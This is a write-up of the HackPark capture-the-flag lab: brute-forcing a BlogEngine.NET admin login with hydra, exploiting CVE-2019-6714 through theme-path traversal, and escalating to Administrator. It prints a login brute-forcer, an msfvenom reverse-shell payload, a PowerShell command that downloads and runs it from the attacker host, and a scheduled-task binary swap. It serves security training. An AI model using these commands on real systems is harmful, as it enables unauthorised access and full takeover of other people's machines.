【TryHackMe write-up】HackPark

May 04, 2020

Introduction

I've recently been working through TryHackMe, a service similar to Hack The Box. https://tryhackme.com/

This post covers one of its machines, HackPark.

(The reason screenshots appear partway through is that copy-and-paste from Kali stopped working for some reason...)

cheat sheet

I keep notes on how to use the tools and similar things as a cheat sheet at the link below; feel free to refer to it. github | sanposhiho/MYCHEATSHEET

nmap

$ nmap -sV -sC 10.10.205.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 12:37 EDT
Nmap scan report for 10.10.205.29
Host is up (0.29s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2020-05-03T16:38:30+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.25 seconds

hydra

The robots.txt entries from the scan point at /Account/*.*, which is where the login page (/Account/login.aspx) lives, so the next step is brute-forcing the admin account with hydra's http-post-form module. The __VIEWSTATE and __EVENTVALIDATION values in the template are the login form's hidden fields, taken from a captured login request, and "Login failed" is the string the page returns on a bad password, which hydra uses as its failure condition.

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.205.29 http-form-post "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=yP%2BzZRxWm7TkECRpYR3xwyRQYtrSszztGRNL4Uz9mctXTcwgfc1qtLY75IX1jHp0HBOCW28lEF5tb%2BktOBtj0SvgoywSBQKL7%2FKJZIHtxXUJVmQvNfEY%2Fq8bLMW7GBXwZ2zCppergFAlHYy8GsmMHW5lrR7w5QqkuUN6ltqTthT8QNUGGZSatX%2F%2FoJCgDZ86oPs93zkwRW0MPVsr7NXTrNZ2KfrEPkMX1%2BsztKZ3dsdI2NG0uLiRSaHKhzwJMrF5OvosCFxofyf61XMfVJkZdWOtsLvWCq9EAt7gS%2BIOXntnaLiot0g%2FYn8pbxC%2Bbq3WEvXX3chl2wGEG8ruqZyMgy8%2BejIN0YpW8OuwcW5tV%2FJmHLlT&__EVENTVALIDATION=k0kn6DqmKUOJ%2B6N01uhNQe5F%2BcmhCqbUvlNVFkf%2BJRFXXYWAkhK3vlUrmM2UP%2F5IMDuOe1xqGkRIqurysUyg8t0T2zCDeuwv%2FZPfVcCdBDiWBaG2TFXif8nB8Xp0iAgP56Rd%2FENNzNEj01U7YAYX2f7fvPpsICyxn1r1st8N9aFCrWcQ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-03 14:23:06

[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.205.29:80/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=yP%2BzZRxWm7TkECRpYR3xwyRQYtrSszztGRNL4Uz9mctXTcwgfc1qtLY75IX1jHp0HBOCW28lEF5tb%2BktOBtj0SvgoywSBQKL7%2FKJZIHtxXUJVmQvNfEY%2Fq8bLMW7GBXwZ2zCppergFAlHYy8GsmMHW5lrR7w5QqkuUN6ltqTthT8QNUGGZSatX%2F%2FoJCgDZ86oPs93zkwRW0MPVsr7NXTrNZ2KfrEPkMX1%2BsztKZ3dsdI2NG0uLiRSaHKhzwJMrF5OvosCFxofyf61XMfVJkZdWOtsLvWCq9EAt7gS%2BIOXntnaLiot0g%2FYn8pbxC%2Bbq3WEvXX3chl2wGEG8ruqZyMgy8%2BejIN0YpW8OuwcW5tV%2FJmHLlT&__EVENTVALIDATION=k0kn6DqmKUOJ%2B6N01uhNQe5F%2BcmhCqbUvlNVFkf%2BJRFXXYWAkhK3vlUrmM2UP%2F5IMDuOe1xqGkRIqurysUyg8t0T2zCDeuwv%2FZPfVcCdBDiWBaG2TFXif8nB8Xp0iAgP56Rd%2FENNzNEj01U7YAYX2f7fvPpsICyxn1r1st8N9aFCrWcQ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 536.00 tries/min, 536 tries in 00:01h, 14343863 to do in 446:01h, 16 active
[80][http-post-form] host: 10.10.205.29   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-03 14:25:35

It looks like we can log in as admin / 1qaz2wsx.
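As an added example (not part of the original post), here is a minimal Python re-implementation of what the hydra command above does, so the moving parts are visible. The path, field names and failure string come from the hydra template; everything else is my own. ASP.NET WebForms logins need __VIEWSTATE and __EVENTVALIDATION, which hydra was given as fixed values from one captured request; this version re-reads them from the form on every attempt. Network I/O sits behind a `send` callable, and `fake_blogengine` is a constructed stand-in for the target so the code runs offline; a real transport would use http.client or requests and keep the session cookie.

```python
from html.parser import HTMLParser
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import parse_qsl, urlencode

LOGIN_PATH = "/Account/login.aspx?ReturnURL=/admin/"
FAILURE_MARKER = "Login failed"  # same failure condition hydra was given
USER_FIELD = "ctl00$MainContent$LoginUser$UserName"
PASS_FIELD = "ctl00$MainContent$LoginUser$Password"
BUTTON_FIELD = "ctl00$MainContent$LoginUser$LoginButton"

# send(method, path, body) -> response body. A real transport would wrap
# http.client/requests and carry the ASP.NET session cookie between calls.
Transport = Callable[[str, str, Optional[str]], str]


class HiddenFieldParser(HTMLParser):
    """Collects <input type="hidden"> name/value pairs (__VIEWSTATE etc.)."""

    def __init__(self) -> None:
        super().__init__()
        self.fields: Dict[str, str] = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if a.get("type") == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def hidden_fields(html: str) -> Dict[str, str]:
    parser = HiddenFieldParser()
    parser.feed(html)
    return parser.fields


def build_login_body(hidden: Dict[str, str], username: str, password: str) -> str:
    """Form body in the same shape as hydra's template ('$' becomes %24)."""
    form = dict(hidden)
    form[USER_FIELD] = username
    form[PASS_FIELD] = password
    form[BUTTON_FIELD] = "Log in"
    return urlencode(form)


def try_login(send: Transport, username: str, password: str) -> bool:
    """One attempt: fetch fresh hidden fields, post credentials, classify."""
    page = send("GET", LOGIN_PATH, None)
    body = build_login_body(hidden_fields(page), username, password)
    return FAILURE_MARKER not in send("POST", LOGIN_PATH, body)


def brute_force(send: Transport, username: str, wordlist: Iterable[str]) -> Optional[str]:
    """Returns the first password whose response lacks the failure marker."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if try_login(send, username, candidate):
            return candidate
    return None


def fake_blogengine(valid_user: str, valid_password: str) -> Transport:
    """Constructed stand-in for the target, not real BlogEngine behaviour:
    issues a fresh __VIEWSTATE per GET and checks credentials on POST."""
    issued = set()
    counter = 0

    def send(method: str, path: str, body: Optional[str]) -> str:
        nonlocal counter
        if method == "GET":
            counter += 1
            token = f"viewstate-{counter}"
            issued.add(token)
            return (
                f'<form><input type="hidden" name="__VIEWSTATE" value="{token}" />'
                '<input type="hidden" name="__EVENTVALIDATION" value="ev-1" />'
                '<input type="submit" name="ctl00$MainContent$LoginUser$LoginButton" value="Log in" /></form>'
            )
        form = dict(parse_qsl(body or ""))
        if form.get("__VIEWSTATE") not in issued:
            # A real ASP.NET app would return a ViewState error page here, which does
            # NOT contain "Login failed" and would be misreported as a hit. That is the
            # usual false-positive trap with failure-string conditions.
            return "<span>Login failed</span>"
        if form.get(USER_FIELD) == valid_user and form.get(PASS_FIELD) == valid_password:
            return "<title>Admin dashboard</title>"
        return "<span>Login failed</span>"

    return send


if __name__ == "__main__":
    target = fake_blogengine("admin", "1qaz2wsx")
    print(brute_force(target, "admin", ["password", "123456", "1qaz2wsx"]))
```

Because the check is "failure string absent" rather than "success string present", any unexpected response (a ViewState error, a lockout page, a 500) is reported as a valid password; always confirm a hydra hit by logging in manually, as the post does in the next step.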

initial access

(screenshot)

The blog runs BlogEngine.NET 3.3.6.0, which has a directory traversal vulnerability (CVE-2019-6714): the theme parameter is used to build the path from which PostView.ascx is loaded, with no check that the result stays inside the themes directory, so a traversal string makes the application load an .ascx file from a directory an authenticated user can write to.

https://www.exploit-db.com/exploits/46353

We use this exploit.

(screenshot) From the file manager in /admin/app/editor/editpost.cshtml, upload the exploit (with LHOST and LPORT set to your listener) as PostView.ascx. Uploaded files land in App_Data/files, so requesting /?theme=../../App_Data/files makes BlogEngine load the uploaded PostView.ascx as the theme's control, which runs the exploit.

With nc listening beforehand, we get a shell:

$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.9.27.249] from (UNKNOWN) [10.10.138.175] 51217
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
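To make the traversal itself concrete, the following is an added example (not BlogEngine.NET's code and not the exploit from the link above): a Python model of the flawed path construction behind the theme parameter, next to a resolver that blocks it. It assumes a themes folder two levels below the web root (modelled here as Custom/Themes, which is what the two `../` in the page's payload require) and an uploads folder at App_Data/files; both are created in a scratch directory so the code runs offline.

```python
import os
import tempfile
from pathlib import Path


def build_site() -> Path:
    """Constructed web-root layout: one legitimate theme plus the attacker's
    upload sitting in App_Data/files (where the file manager stores uploads)."""
    root = Path(tempfile.mkdtemp(prefix="hackpark-"))
    theme = root / "Custom" / "Themes" / "Standard"
    theme.mkdir(parents=True)
    (theme / "PostView.ascx").write_text("legitimate theme control")
    uploads = root / "App_Data" / "files"
    uploads.mkdir(parents=True)
    (uploads / "PostView.ascx").write_text("attacker-uploaded control")
    return root


def vulnerable_resolve(root: Path, theme: str) -> Path:
    """The flawed pattern: the request's theme value is concatenated into the
    path with no containment check, so '../../App_Data/files' walks out of
    Custom/Themes and lands on the upload directory."""
    raw = root / "Custom" / "Themes" / theme / "PostView.ascx"
    return Path(os.path.normpath(str(raw)))


def hardened_resolve(root: Path, theme: str) -> Path:
    """Accept only a single plain path component, then re-check containment on
    the resolved path so symlinks or odd encodings cannot sneak past the
    string filter."""
    if not theme or theme in (".", "..") or any(c in theme for c in "/\\\0"):
        raise ValueError(f"invalid theme name: {theme!r}")
    themes_dir = (root / "Custom" / "Themes").resolve()
    candidate = (themes_dir / theme / "PostView.ascx").resolve()
    if candidate.parent.parent != themes_dir:
        raise ValueError(f"theme path escapes {themes_dir}")
    return candidate


def is_rejected(root: Path, theme: str) -> bool:
    """True when the hardened resolver refuses the theme value."""
    try:
        hardened_resolve(root, theme)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    site = build_site()
    payload = "../../App_Data/files"
    hit = vulnerable_resolve(site, payload)
    print("vulnerable resolves to:", hit, "->", hit.read_text())
    print("hardened rejects payload:", is_rejected(site, payload))
    print("hardened allows 'Standard':", hardened_resolve(site, "Standard"))
```

The second check in `hardened_resolve` (comparing the resolved parent against the resolved themes directory) is the one that matters; the string filter alone is easy to bypass with encodings the framework decodes later.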

Switching over to meterpreter

The shell spawned by the web application runs with the privileges of the IIS worker process rather than as Administrator (note the working directory, c:\windows\system32\inetsrv), so this is only a foothold. Upgrading to meterpreter makes file transfer and later enumeration easier.

Generate a payload with msfvenom and serve it over HTTP,

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.27.249 LPORT=1111 -f exe -o sheshe.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: sheshe.exe
$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

download it from the shell obtained earlier,

C:\Users\Public>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.27.249:8000/sheshe.exe','sheshe.exe')"

C:\Users\Public>dir
 Volume in drive C has no label.
 Volume Serial Number is 0E97-C552
 Directory of C:\Users\Public
05/04/2020  02:23 AM    <DIR>          .
05/04/2020  02:23 AM    <DIR>          ..
08/22/2013  08:39 AM    <DIR>          Documents
08/22/2013  08:39 AM    <DIR>          Downloads
05/04/2020  02:23 AM    <DIR>          Microsoft
08/22/2013  08:39 AM    <DIR>          Music
08/22/2013  08:39 AM    <DIR>          Pictures
05/04/2020  02:23 AM            73,802 sheshe.exe
08/22/2013  08:39 AM    <DIR>          Videos
               1 File(s)         73,802 bytes
               8 Dir(s)  39,054,577,664 bytes free

then set up multi/handler in metasploit to listen,

msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.9.27.249      yes       The listen address (an interface may be specified)
   LPORT     1111             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.9.27.249:1111

and, following the familiar flow, execute the downloaded file:

c:\Users\Public>powershell "Start-Process "sheshe.exe"

The connection comes back as a meterpreter session:

[*] Started reverse TCP handler on 10.9.27.249:1111 
[*] Sending stage (180291 bytes) to 10.10.138.175
[*] Meterpreter session 1 opened (10.9.27.249:1111 -> 10.10.138.175:51236) at 2020-05-04 05:28:09 -0400

meterpreter > 

Using windows-exploit-suggester.py

sys.txt is the output of systeminfo on the target, and the .xls file is the Microsoft security bulletin database that the tool fetches with --update.

$ ./windows-exploit-suggester.py --systeminfo sys.txt --database 2020-02-24-mssb.xls
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 8 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 249 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*] 
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*] 
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*] 
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*] 
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*] 
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*] 
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*] 
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*] 
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*]   https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
[*] 
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*]   https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*] 
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*]   https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
[*] 
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*]   https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
[*] 
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*]   https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
[*] 
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[*]   https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*]   http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*]   http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*] 
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   http://www.exploit-db.com/exploits/34458/
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[*] done

I ran this for one of the TryHackMe questions, but I didn't end up using the results afterwards.

winPEAS.bat

Upload it with meterpreter's upload command and run it with .\winPEAS.bat. (screenshot)

Look at the processes section. (screenshot) Nothing looked suspicious by name at first glance (at least to me), but an administrator periodically running something, and you swapping out the file that gets run, is a common pattern, so I looked into the scheduler.

C:\Program Files (x86)\SystemScheduler contains WScheduler.exe. (screenshot)

Going through the log files, C:\Program Files (x86)\SystemScheduler\Events\20198415519.INI_LOG.txt shows the following:

(screenshot of the log)

Message.exe is being executed periodically. So we replace C:\Program Files (x86)\SystemScheduler\Message.exe with the sheshe.exe used earlier for the switch to meterpreter and wait with multi/handler again. Before overwriting it, confirm with icacls that the account you have can actually write to the file, and that the log shows the job running as Administrator; otherwise the replacement either fails or calls back with the same low privileges. Keep a copy of the original Message.exe as well so the scheduled job can be restored afterwards.

(screenshot)

We get a shell as Administrator.

Conclusion

I've written this up briefly, but I struggled quite a bit with finding the suspicious process and going through the logs.

I'll keep at it.
